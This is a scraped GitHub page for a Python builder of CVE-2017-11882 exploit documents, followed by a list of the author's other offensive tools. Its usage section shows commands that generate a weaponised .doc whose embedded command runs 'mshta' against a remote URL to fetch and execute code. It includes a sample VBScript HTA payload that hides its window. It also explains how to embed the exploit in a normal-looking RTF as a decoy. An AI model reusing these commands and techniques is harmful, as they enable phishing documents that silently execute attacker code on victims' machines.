• Stars
    star
    531
  • Rank 83,526 (Top 2 %)
  • Language
    Python
  • Created almost 7 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882

CVE-2017-11882

43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882

109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ (膜一波,现在unamer的代码已经可以执行shellcode了~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Usage

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

use mshta

python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

43b命令长度不能超过43 bytes,109b命令长度不能超过109 bytes

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

关于自定义内容

其实关于自定义内容的姿势也是跟别的师傅学来的,很早之前就已经写成脚本了,本来不打算公开,但是看到小组内已经有人发出来了,没办法,只能公开了,其实方式很简单,只需要文本文件打开正常的文档rtf,复制{*\datastore 之前的所有内容,替换 {\object\objautlink\objupdate之前的内容即可,所以写到脚本里面就很简单了。

添加自定义内容使用方式,选择任意脚本:

python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

自定义内容在input.rtf中。

关于unamer的最新的605字节利用脚本就不更新了,有兴趣自己改。

More Repositories

1

Intranet_Penetration_Tips

2018年初整理的一些内网渗透TIPS,后面更新的慢,所以整理出来希望跟小伙伴们一起更新维护~
4,089
star
2

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Python
567
star
3

Pentest

tools
C
524
star
4

Exchange2domain

CVE-2018-8581
Python
358
star
5

cve-2020-0688

cve-2020-0688
Python
315
star
6

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
7

CVE-2019-1040

CVE-2019-1040 with Exchange
Python
237
star
8

Mailget

通过脉脉用户猜测企业邮箱
Python
227
star
9

get_ip_by_ico

从shodan获取使用了相同favicon.ico的网站
Python
190
star
10

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
11

PySQLTools

Mssql利用工具
Python
165
star
12

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
13

owa_info

获取Exchange信息的小工具
Python
160
star
14

RelayX

NTLM relay test.
Python
156
star
15

CS_Chinese_support

Cobalt strike 修改支持回显中文。
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

Py写的tsh的流量加解密过程。
C
25
star
32

xslt_poc

Execute codes From XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

GIt tun
Python
1
star
38

Ridter

1
star